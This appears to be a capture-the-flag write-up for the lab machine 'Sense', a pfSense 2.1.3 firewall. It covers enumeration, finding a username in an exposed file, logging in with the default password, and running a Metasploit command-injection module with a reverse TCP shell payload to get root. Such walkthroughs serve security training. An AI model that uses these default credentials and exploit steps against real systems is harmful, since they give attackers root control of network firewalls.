# Sense
> # 10.10.10.60

nmap
>PORT    STATE SERVICE    VERSION
[80/tcp](portscan.md#80)  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
[443/tcp](portscan.md#443) open  ssl/https?

This is the webpage on the port 80 and 443:
![[sense1.png]]

It's a "pf sense" stuff, from wikipedia:
>pfSense is a firewall/router computer software distribution based on FreeBSD

We have this [exploit](https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_graph_injection_exec/) but we need to be auth in order to use it.

The enumeration on port 80 is a complete waste of time, it's empty but enumerating on the port 443 - with https - we can find a couple of file:
``` (note:dirbuster dictionary are way bigger than the others,use those ones.)```
![[sense3.png]]
changelog.txt file:
![[sense2.png]]
system-users.txt file:
![[sense4.png]]

We have the user and google says that the default password is pfsense so: rohit@pfsense
![[sense5.png]]
Confirmed and the admin panel tell us that the **version** is **2.1.3.**

Now we have the creds we can use the msf module previously found so let's see if that exploit is a valid one.

![[sense6.png]]
using show info on the second module we get this description:
>Description:
  pfSense, a free BSD based open source firewall distribution, version   <= 2.2.6 contains a remote command execution [...] A non-administrative authenticated attacker can inject arbitrary operating system commands and execute them as the root user. Verified against 2.2.6, 2.2.5, and 2.1.3.
  
 Noticed? **Verified against 2.1.3.**
 Let's set everything up and try it.
 >use unix/http/pfsense_graph_injection_exec
 >set username rohit
 >set rhost 10.10.10.60
 >set lhost tun0
 >exploit

But the revshell that we get from this exploit is a bit weak, we can't basically do nothing with it, not even upload file for a better shell.
The solution to this problem is quiet simple:
The default payload in this exploit is a php reverse shell, just switch it to a tcp one and you will be good to go:
>set payload generic/shell_reverse_tcp
> exploit

And here we go:
![[sense7.png]]
We're root.

#machine #msf #pfsense